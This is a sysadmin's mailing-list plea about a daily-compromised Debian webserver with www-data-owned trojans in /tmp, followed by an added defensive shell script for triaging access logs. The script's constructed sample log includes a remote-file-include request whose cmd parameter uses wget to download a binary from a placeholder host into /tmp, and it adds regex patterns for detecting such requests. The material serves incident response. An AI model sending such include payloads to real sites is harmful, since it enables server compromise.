
advice on finding the vulnerable code on webserver



Hi all,

One of our webservers seems to get compromised on a daily basis.
When I do a ps ax I see these processes all the time.

18687 ?        S      0:00 shell
18701 ?        Z      0:00 [sh <defunct>]
18704 ?        T      0:00 ./3 200.177.162.185 1524
18705 ?        Z      0:00 [3 <defunct>]

And if I check the /tmp dir there are strange executable files in there
that are owned by www-data.
Such as ./3 and others like ./bdshell.
Definitely some sort of Trojan.

When I did a virus check first time it showed that it was infected with
the old Linux.RST virus, it basically stuffed the entire /bin directory.

I did a rebuild, virus checked all client files on a different server,
then copied them back.

After a week, same thing.
Infected.

/tmp/sl# ls -al
total 452
drwxr-xr-x    2 www-data www-data     4096 Jun  1 09:32 .
drwxrwxrwt    3 root     root         4096 Jun  1 09:37 ..
-rwsrwsrwt    1 www-data www-data   446714 May 29 05:12 ps.htm

I'm pretty sure it's one of our clients who has some dodgy php-nuke
sites or something like that.

All our other webservers are fine running the same build.
But this server is the major client one where we allow them to FTP and
make MySQL changes.

I'd appreciate some help on how to stop this from happening.

Running Debian Stable with all the security updates.

P.S. Sorry for the Disclaimer, company policy, which I don't agree with,
yet they pay me so I must comply  :/

--
Ross.


DISCLAIMER: This e-mail and any files transmitted with it may 
be privileged and confidential, and are intended only for the use of the 
intended recipient. If you are not the intended recipient or responsible for 
delivering this e-mail to the intended recipient, any use, dissemination, 
forwarding, printing or copying of this e-mail and any attachments is strictly 
prohibited. If you have received this e-mail in error, please REPLY TO the 
SENDER to advise the error AND then DELETE the e-mail from your system.
Any views expressed in this e-mail and any files transmitted with 
it are those of the individual sender, except where the sender specifically 
states them to be the views of our organisation.
Our organisation does not represent or warrant that 
the attached files are free from computer viruses or other defects. The user 
assumes all responsibility for any loss or damage resulting directly or 
indirectly from the use of the attached files. In any event, the liability to 
our organisation is limited to either the resupply of the attached files or the 
cost of having the attached files resupplied.



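A worked triage example, added here and not part of the original post or any reply to it. The post's own evidence already narrows the search: the droppers in /tmp are owned by www-data, so they were written by something running under the web server, and the directory listing gives a timestamp (ps.htm, May 29 05:12). The script below does the two things a responder would do with that: list the executable or setuid files a given user has dropped in a directory, and pull the access-log requests from the same minutes that carry a remote-file-include pattern (a query parameter pointing at http:// or ftp://, or a cmd= parameter), which is how a PHP application of that era was typically made to fetch and run a file as www-data. The log format is Apache combined; the log lines, the year, the IP addresses and the /modules/example/ path are all constructed for the example, not taken from the compromised host.

```shell
#!/bin/sh
# Added example for triaging a www-data-owned dropper found in /tmp.
# Not code from the original post. Log lines, hosts and paths below are constructed.

# Constructed Apache combined-format access log. The window (05:10-05:19) is
# chosen to bracket the 05:12 mtime of the file seen in the /tmp listing;
# the year, client IPs and the /modules/example/ path are assumed.
SAMPLE_LOG=$(cat <<'EOF'
203.0.113.5 - - [29/May/2003:05:10:42 +0000] "GET /index.php HTTP/1.0" 200 5123 "-" "Mozilla/4.0"
203.0.113.9 - - [29/May/2003:05:11:58 +0000] "GET /modules/example/index.php?path=http://198.51.100.7/cmd.txt? HTTP/1.0" 200 812 "-" "Mozilla/4.0"
203.0.113.9 - - [29/May/2003:05:12:03 +0000] "GET /modules/example/index.php?path=http://198.51.100.7/cmd.txt?&cmd=wget%20http://198.51.100.7/3%20-O%20/tmp/3 HTTP/1.0" 200 44 "-" "Mozilla/4.0"
203.0.113.22 - - [29/May/2003:05:12:40 +0000] "GET /images/logo.gif HTTP/1.0" 200 2201 "-" "Mozilla/4.0"
EOF
)

# Files in DIR owned by USER that are setuid, setgid or owner-executable.
# On the compromised box this would be: dropped_files /tmp www-data
dropped_files() {
    find "$1" -user "$2" -type f \( -perm -4000 -o -perm -2000 -o -perm -100 \)
}

# Requests whose timestamp starts with WINDOW (e.g. "29/May/2003:05:1" covers
# 05:10-05:19) and whose query string either points a parameter at a remote
# URL (remote-file-include pattern) or carries a cmd= parameter.
# Usage: suspicious_requests "$LOGTEXT" "29/May/2003:05:1"
suspicious_requests() {
    printf '%s\n' "$1" | grep -F "[$2" | grep -Ei '\?[^" ]*=(https?|ftp)://|[?&]cmd='
}

# Number of such requests; prints 0 (not an error) when there are none.
suspicious_count() {
    suspicious_requests "$1" "$2" | grep -c . || true
}

# Distinct remote hosts referenced by those requests: where the payload was
# fetched from, and what to look for in firewall logs and other clients' logs.
remote_hosts() {
    suspicious_requests "$1" "$2" | grep -Eo '(https?|ftp)://[^/"?& %]+' | sort -u
}

# Stand-alone demo over the constructed log. On a real host, replace SAMPLE_LOG
# with "$(cat /var/log/apache/access.log)" and set the window from the mtime
# of the dropper (ls -l --time-style=full-iso /tmp/3).
WINDOW='29/May/2003:05:1'
echo "suspicious requests in window $WINDOW:"
suspicious_requests "$SAMPLE_LOG" "$WINDOW" || echo "(none)"
echo "remote hosts referenced:"
remote_hosts "$SAMPLE_LOG" "$WINDOW"
```

The request that matches is the vulnerable script: its path names the client's site and the PHP file whose parameter accepts a URL, which is the code to remove or patch. Because every vhost runs as the same www-data user, one client's include bug is enough to drop files for the whole box, so the same window should be checked in every vhost's log, not only the suspected one; and with the fetch host in hand, outbound connections to it from www-data (wget, curl, or the ./3 connecting back on 1524 in the ps output) are the thing to block and alert on until the code is fixed.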